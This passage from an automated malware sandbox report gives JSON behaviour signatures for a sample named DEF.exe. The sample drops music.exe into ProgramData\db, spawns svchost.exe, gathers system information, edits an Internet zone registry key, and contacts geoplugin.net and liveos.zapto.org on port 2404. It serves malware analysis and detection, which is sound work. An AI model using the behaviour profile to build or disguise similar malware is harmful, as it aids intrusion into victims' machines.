\"%WINDIR%\\System32\\rpcrt4.dll\" at 76BA0000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76BA0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"DEF.exe\" called \"CreateProcessW\" with parameter \"\"%ALLUSERSPROFILE%\\db\\music.exe\"\" - (UID: 00000000-00006032)\n \"music.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\System32\\svchost.exe\" - (UID: 00000000-00006012)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"DEF.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"DEF.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"music.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"music.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"music.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"music.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"music.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-1\" - [base:0; Status:c0000135]\n \"music.exe\" failed to load missing module \"ext-ms-win-kernel32-package-current-l1-1-0\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"music.exe\" (UID: 00000000-00006012)\n Spawned process \"svchost.exe\" (UID: 00000000-00004364)\n Spawned process \"music.exe\" (UID: 00000000-00004492)\n Spawned process \"svchost.exe\" (UID: 00000000-00005004)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"music.exe\" (UID: 00000000-00006012)\n Spawned process \"svchost.exe\" (UID: 00000000-00004364)\n Spawned process \"music.exe\" (UID: 00000000-00004492)\n Spawned process \"svchost.exe\" (UID: 00000000-00005004)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"music.exe\" (UID: 00000000-00004492) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"music.exe\" (UID: 00000000-00004492) was launched with modified environment variables: \"PSModulePath, PATHEXT\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"DEF.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DEF.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DEF.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"music.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"music.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"music.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.6712F542.bin\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.6712F542.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.6712F542.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"DISMHOST.EXE.6712F542.bin\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:2404\"\n \"<IPv4>:80\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-0", "type": 7, "relevance": 1, "name": "Contacts domains", "description": "\"geoplugin.net\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-2", "type": 7, "relevance": 5, "name": "GETs files from a webserver", "description": "\"GET /json.gp HTTP/1.1\nHost: geoplugin.net\nCache-Control: no-cache\" Response ==> HTTP/1.1 200 OK\ndate: Fri\n 18 Oct 2024 22:34:32 GMT\nserver: Apache\ncontent-length: 962\ncontent-type: application/json; charset=utf-8\ncache-control: public\n max-age=300\naccess-control-allow-origin: * with response body ==>7B0A20202267656F706C7567696E5F72657175657374223A2236342E3132342E31322E313632222C0A20202267656F706C7567696E5F737461747573223A3230.......\n \"GET /json.gp HTTP/1.1\nHost: geoplugin.net\nCache-Control: no-cache\" Response ==> HTTP/1.1 200 OK\ndate: Fri\n 18 Oct 2024 22:36:54 GMT\nserver: Apache\ncontent-length: 962\ncontent-type: application/json; charset=utf-8\ncache-control: public\n max-age=300\naccess-control-allow-origin: * with response body ==>7B0A20202267656F706C7567696E5F72657175657374223A2236342E3132342E31322E313632222C0A20202267656F706C7567696E5F737461747573223A3230.......", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"geoplugin.net\"\n \"liveos.zapto.org\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"DEF.exe\" has an executable section named \".text\"\n \"music.exe\" has an executable section named \".text\"\n \"DISMHOST.EXE.6712F542.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"DEF.exe\" has an writable section named \".data\"\n \"DEF.exe\" has an writable section named \".tls\"\n \"music.exe\" has an writable section named \".data\"\n \"music.exe\" has an writable section named \".tls\"\n \"DISMHOST.EXE.6712F542.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"DEF.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"music.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"DISMHOST.EXE.6712F542.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"DEF.exe\" was detected as \"VC8 -> Microsoft Corporation\"\n \"music.exe\" was detected as \"VC8 -> Microsoft Corporation\"\n \"DISMHOST.EXE.6712F542.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"DEF.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"DEF.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"DEF.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"DEF.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"DEF.exe\" trying to access non-existent file \"C:\\shcore.DLL\"\n \"DEF.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shcore.DLL\"\n \"DEF.exe\" trying to access non-existent file \"C:\\Windows\\system\\shcore.DLL\"\n \"DEF.exe\" trying to access non-existent file \"C:\\Windows\\shcore.DLL\"\n \"DEF.exe\" trying to access non-existent file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"DEF.exe\" trying to access non-existent file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"DEF.exe\" trying to access non-existent file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"\n \"DEF.exe\" trying to access non-existent file \"C:\\Iphlpapi.DLL\"\n \"DEF.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"DEF.exe\" trying to access non-existent file \"C:\\Rstrtmgr.DLL\"\n \"DEF.exe\" trying to access non-existent file \"C:\\ncrypt.dll\"\n \"DEF.exe\" trying to access non-existent file \"C:\\bcrypt.dll\"\n \"DEF.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"DEF.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"DEF.exe\" reads file \"c:\\def.exe\"\n \"DEF.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"DEF.exe\" reads file \"c:\\users\\desktop.ini\"\n \"DEF.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini\"\n \"DEF.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini\"\n \"DEF.exe\" reads file \"c:\\programdata\\microsoft\\windows\\start menu\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"DEF.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"\"; Value: \"\")\n \"DEF.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\TIME ZONES\\ROMANCE STANDARD TIME\\DYNAMIC DST\"; Key: \"\"; Value: \"\")\n \"DEF.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{48C6BE7C-3871-43CC-B46F-1449A1BB2FF3}\"; Key: \"\"; Value: \"\")\n \"DEF.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{48C6BE7C-3871-43CC-B46F-1449A1BB2FF3}\"; Key: \"\"; Value: \"\")\n \"DEF.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{48C6BE7C-3871-43CC-B46F-1449A1BB2FF3}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"DEF.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{48C6BE7C-3871-43CC-B46F-1449A1BB2FF3}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"DEF.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{48C6BE7C-3871-43CC-B46F-1449A1BB2FF3}\\PROGID\"; Key: \"\"; Value: \"\")\n \"DEF.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{48C6BE7C-3871-43CC-B46F-1449A1BB2FF3}\\PROGID\"; Key: \"\"; Value: \"\")\n \"DEF.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{48C6BE7C-3871-43CC-B46F-1449A1BB2FF3}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"DEF.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{48C6BE7C-3871-43CC-B46F-1449A1BB2FF3}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"DEF.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{48C6BE7C-3871-43CC-B46F-1449A1BB2FF3}\\INPROCHANDLER32\"; Key: \"\"; Value: \"\")\n \"DEF.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{48C6BE7C-3871-43CC-B46F-1449A1BB2FF3}\\INPROCHANDLER32\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"DEF.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"DEF.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"DEF.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"DEF.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"DEF.exe\" trying to touch file \"C:\\version.DLL\"\n \"DEF.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"DEF.exe\" trying to touch file \"C:\\DEF.exe.Local\\\"\n \"DEF.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\"\n \"DEF.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll\"\n \"DEF.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"DEF.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"DEF.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"DEF.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"DEF.exe\" trying to touch file \"C:\\shcore.DLL\"\n \"DEF.exe\" trying to touch file \"C:\\Windows\\system32\\shcore.DLL\"\n \"DEF.exe\" trying to touch file \"C:\\Windows\\system\\shcore.DLL\"\n \"DEF.exe\" trying to touch file \"C:\\Windows\\shcore.DLL\"\n \"DEF.exe\" trying to touch file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"DEF.exe\" trying to touch file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"DEF.exe\" trying to touch file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"DEF.exe\" trying to access non-existent file \"C:\\DEF.exe.Local\\\"\n \"DEF.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\desktop.ini\"\n \"DEF.exe\" trying to access non-existent file \"C:\\ProgramData\\Microsoft\\desktop.ini\"\n \"DEF.exe\" trying to access non-existent file \"C:\\ProgramData\\db\\desktop.ini\"\n \"DEF.exe\" trying to access non-existent file \"C:\\Program Files\\7-Zip\\Lang\\en.txt\"\n \"DEF.exe\" trying to access non-existent file \"\\SystemRoot\\WinSxS\\FileMaps\\programdata_db_9e69a7f415688934.cdf-ms\"\n \"DEF.exe\" trying to access non-existent file \"C:\\ProgramData\\db\\music.exe:Zone.Identifier\"\n \"DEF.exe\" trying to access non-existent file \"C:\\DEF.EXE.LOCAL\"\n \"DEF.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\DESKTOP.INI\"\n \"DEF.exe\" trying to access non-existent file \"C:\\ProgramData\\Microsoft\\DESKTOP.INI\"\n \"DEF.exe\" trying to access non-existent file \"C:\\ProgramData\\db\\DESKTOP.INI\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"DEF.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"DEF.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"DEF.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-113", "type": 6, "relevance": 5, "name": "Touches files in program files directory", "description": "\"DEF.exe\" touched file \"C:\\Program Files\\7-Zip\\Lang\\en.txt\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"DEF.exe\" writes file \"c:\\programdata\\db\\music.exe\"\n \"DEF.exe\" writes file \"%allusersprofile%\\db\\music.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"DEF.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"DEF.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"DEF.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"DEF.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"DEF.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"DEF.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"DEF.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"DEF.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"DEF.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"DEF.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"music.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\db\\music.exe]- [targetUID: 00000000-00006032]\n \"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: N/A]\n \"DISMHOST.EXE.6712F542.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"json_1_.json\" has type \"JSON data\"- [targetUID: N/A]\n \"music.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"DEF.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4690264'}\" (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadResource with parameter {'hModule': '1866924032', 'hResInfo': '1866932352'}\" (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadResource with parameter {'hModule': '268435456', 'hResInfo': '268493040'}\" (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadResource with parameter {'hModule': '1891041280', 'hResInfo': '1891154192'}\" (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadResource with parameter {'hModule': '41353217', 'hResInfo': '41479648'}\" (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadResource with parameter {'hModule': '41353217', 'hResInfo': '41453648'}\" (UID: 00000000-00006032)\n \"music.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4690264'}\" (UID: 00000000-00006012)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"DEF.exe\" called \"FindResourceA\" with parameter \"4639268\" - (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindResourceW\" with parameter \"789\" - (UID: 00000000-00006032)\n \"music.exe\" called \"FindResourceA\" with parameter \"4639268\" - (UID: 00000000-00006012)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"DEF.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"DEF.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb117658871b000050fd7f9a5c907700f0fd7f00c612004450fd7f00000000400000003f000000200000000050fd7ff4c51200c15c907760829777200000000050fd7f9a5c907700f0fd7f18c6120057898f778083977713179975d8eb1176 (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b203100001c7b2500100000001c00000028de12002cdf12007ac8d36f08000000ac4e8e7793799875ffffffff90de1200000000007cde12000010000004000000002000009cde1200bf799875ffffffff00006e0100006e010010000004000000d4de1200000013006ee9a76f00006e01ff000000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100205061636b203100001c7b2500100000001c00000028de12002cdf12007ac8d36f08000000ac4e8e7793799875ffffffff90de1200000000007cde12000010000004000000002000009cde1200bf799875ffffffff00006e0100006e010010000004000000d4de1200000013006ee9a76f (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b203100205061636b203100205061636b203100001c7b2500100000001c00000028de12002cdf12007ac8d36f08000000ac4e8e7793799875ffffffff90de1200000000007cde12000010000004000000002000009cde1200bf799875ffffffff00006e0100006e010010000004000000d4de1200 (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000095e18b77ac241700fefffffff5f68f77634d9077e8201700a857576b40465700b2f48f77b0f28a774cdf12000000566b0000566b804d907754f38a77e0000000e000566b00000000b8de1200e412566b4ce0120000000000010000001cdf120040f58f77000000000000000008df1200 (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006032)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"DEF.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006032)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"DEF.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00006032)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"DEF.exe\" called \"IsWow64Process\" with parameter \"6032\" - (UID: 00000000-00006032)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"DEF.exe\" called \"GetForegroundWindow\" (UID: 00000000-00006032)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"DEF.exe\" called \"RtlGetVersion\" with parameter 